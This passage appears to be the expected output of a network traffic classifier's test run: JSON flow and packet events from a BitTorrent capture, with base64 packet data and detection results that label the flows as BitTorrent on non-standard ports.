{"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455469972136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469972136,"pkt":"xCwDBkn+LFbcjDU0CABFAACrWLRAAHIGbE2+Z8M4wKgBA7YpzqY3RpyAk9Uv64AYAQLhNwAAAQEICgC\/ZvwZ3AFEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xopUl3euuGS1IpvoAAAEBFABkMTplaTBlNDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzE="} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455469973108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1455469973108,"pkt":"LFbcjDU0xCwDBkn+CABFAADJDUpAAEAGAADAqAEDvmfDOM6mtimT1TBDN0ac94AZ\/\/9EBwAAAQEIChncBtUAv2b8M2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0Or5nwzhlAAAAAQ8="} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455469974358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974358,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DCdAAEAGAADAqAEDUjrYc86rlaExvR02+FTOIoAY\/\/\/swwAAAQEIChncC64AhEXwE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjk6UZQGZj8psqfs="} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455469974533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974533,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WuVAAEAGAADAqAEDUjlhU86qz5GeFCpM34MiOYAY0pJ1ogAAAQEIChncDF0AFHySE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjDhVI8cWXj55ew="} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 
(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455469974879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469974879,"pkt":"xCwDBkn+LFbcjDU0CABFAACrC6JAAHcGgnNSOWFTwKgBA8+RzqrfgyI5nhQqkIAYAQJ8JwAAAQEICgAUfLUZ3AxdE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wosdxOntFzioIvnoAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTBlMTptZDExOnU="} +01301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455469974888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469974888,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8C6RAAHcGgOBSOWFTwKgBA8+RzqrfgyKwnhQqkIAZAQKTPAAAAQEICgAUfLYZ3AxdcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNTMxMzdlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTA2ZTY6eW91cmlwNDpSN80BZQAAAHQF\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/+\/\/\/\/\/\/\/\/\/r\/\/\/\/\/\/\/\/\/\/9\/\/P\/v\/\/\/\/\/+\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/ff\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/7\/\/\/\/+\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/t\/u\/\/\/\/\/\/\/\/\/gAAAAAUEAAABGAAAAAUEAAACxAAAAAUEAAAAmwAAAAUEAAAB\/wAAAAUEAAABMwAAAAUEAAABJgAAAAUEAAABZAAAAAUEAAACOgAAAAUEAAAA1QAAAAUEAAACEAAAAAUEAAACFgAAAAUEAAADTAAAAAUEAAABWwAAAAUEAAACMAAAAAUEAAADPQAAAAUEAAADSQAAAAUEAAACnwAA
AAUEAAAAeQAAAAUEAAAABgAAAAUEAAAA0wAAAAUEAAABJwAAAAUEAAACfwAAAAUEAAADVQAAAAUEAAADWQ=="} +01456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455469975129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":705,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":705,"pkt_l4_len":671,"thread_ts_msec":1455469975129,"pkt":"xCwDBkn+LFbcjDU0CABFAAKzM7RAAHUG4zdSOthzwKgBA5Whzqv4VM4iMb0deoAY\/SAeWQAAAQEICgCERjQZ3AuuE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3woo6KDyQqidsX6OsAAADnFABkMTplaTBlNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MDdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/e\/\/\/\/\/9\/\/\/\/\/v\/\/2\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/7\/f\/+\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/7\/\/\/\/7+\/+\/\/\/+\/\/\/\/\/v\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/8\/\/\/\/\/\/\/f\/\/\/\/3\/\/\/\/\/\/\/\/+AAAAABQQAAAI1AAAABQQAAAEuAAAABQQAAABqAAAABQQAAAE\/AAAABQQAAABtAAAABQQAAAKkAAAABQQAAAElAAAABQQAAAL5AAAABQQAAANYAAAABQQAAAA2AAAABQQAAAIPAAAABQQAAAJBAAAABQQAAAAOAAAABQQAAAMMAAAABQQAAAJ5AAAABQQAAAF6AAAABQQAAAJZAAAABQQAAAATAAAABQQAAAM4AAAABQQAAAItAAAABQQAAAHdAAAABQQAAAEPAAAABQQAAAMNAAAABQQAAABX"} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455469975234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975234,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WJNAAEAGAADAqAEDlxpfHs6vWJEERbWJ8qKonIAYJJ+4TgAAAQEIChncDxURKgrLE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhul1XASmRgFxRA="} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455469975240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975240,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4VgZAAEAGAADAqAEDl0j\/o86w6hjbuZSz\/XvqFoAYKEhZAgAAAQEIChncDxoAaM\/9E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpHIptJ+s3GSLpo="} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 
(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455469975265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975265,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4dKFAAEAGAADAqAEDTzXkAs6tOSO1PcfcBOlxsoAYN4r1TQAAAQEIChncDzIAAH\/nE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpuHBUmeY0dBAis="} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455469975295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1455469975295,"pkt":"xCwDBkn+LFbcjDU0CABFAACPKABAAHIGh9GXSP+jwKgBA+oYzrD9e+oW27mU94AYAQF3EQAAAQEICgBo0AMZ3A8aE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopW+kcQUcjSA5QoAAADnFABkMTplaTBlNDppcHY0NDqXSA=="} +00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455469975314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1455469975314,"pkt":"xCwDBkn+LFbcjDU0CABFAACdCeVAAHIGRpKXGl8ewKgBA1iRzq\/yoqicBEW1zYAYHVwArAAAAQEIChEqCxYZ3A8VE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coV7lk33H8ZRraqcAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVf"} 
+00991{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455469975341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":449,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":449,"pkt_l4_len":415,"thread_ts_msec":1455469975341,"pkt":"LFbcjDU0xCwDBkn+CABFAAGz+chAAEAGAADAqAEDUjrYc86rlaExvR16+FTQoYAY\/\/\/t\/gAAAQEIChncD3wAhEZHAAAA+hQAZDE6ZWkwZTQ6aXB2NDQ6UjfNATQ6aXB2NjE2Ov6AAAAAAAAAxiwD\/\/4GSf4xMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0MDk1OWU0OnJlcXFpMjU1ZTE6djE5OsK1VG9ycmVudCBNYWMgMS44LjY2OnlvdXJpcDQ6UjrYc2UAAAABDwAAAAMJn\/8AAAADFAMAAAAAAQIAAABlFAZkODptc2dfdHlwZWkwZTM6bnVtaTIwZTY6ZmlsdGVyNjQ6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGU="} +01314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1455469975379,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":600,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":600,"pkt_l4_len":566,"thread_ts_msec":1455469975379,"pkt":"xCwDBkn+LFbcjDU0CABFAAJKCedAAHIGROOXGl8ewKgBA1iRzq\/yoqkFBEW1zYAYHVwJbQAAAQEIChEqC1QZ3A9hYWdvaTJlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkyMjY3M2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTFlNjp5b3VyaXA0OlI3zQFlAAAAdAV\/v+\/\/f\/\/+\/\/\/\/\/\/\/\/\/\/fv\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/f\/\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/7\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/f\/\/\/\/7\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/9\/9\/\/\/f\/\/\/\/\/\/\/\/\/\/\/
\/\/\/\/\/\/\/9\/\/\/ff+AAAAABQQAAAC+AAAABQQAAAB0AAAABQQAAAJcAAAABQQAAAOGAAAABQQAAAEaAAAABQQAAAA3AAAABQQAAAL2AAAABQQAAAOAAAAABQQAAAGXAAAABQQAAALiAAAABQQAAAIeAAAABQQAAAFXAAAABQQAAAJLAAAABQQAAAB7AAAABQQAAAI\/AAAABQQAAADyAAAABQQAAAAAAAAABQQAAAAgAAAABQQAAAH+AAAABQQAAANsAAAABQQAAAATAAAABQQAAALWAAAABQQAAAAJAAAABQQAAAGq"} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455469975393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1455469975393,"pkt":"LFbcjDU0xCwDBkn+CABFAADeIplAAEAGAADAqAEDl0j\/o86w6hjbuZVQ\/XvsloAYKDdZaAAAAQEIChncD64AaNAEMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEyOnV0X3JlY29tbWVuZGk1ZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0OpdI\/6NlAAAAAQ8="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1455469975407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975407,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4fvZAAEAGAADAqAEDeD4h8c6umaQbpzY0C9TW44AYjjZcRQAAAQEIChncD7sAQ+m5E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhq4aGFIV+2F24M="} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1455469975622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975622,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4JlBAAEAGAADAqAEDTzeBFs6sL0FM+lulp3q\/xoAYVhCSYwAAAQEIChncEJACXeJGE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsY\/A3YcaePRRY8="} 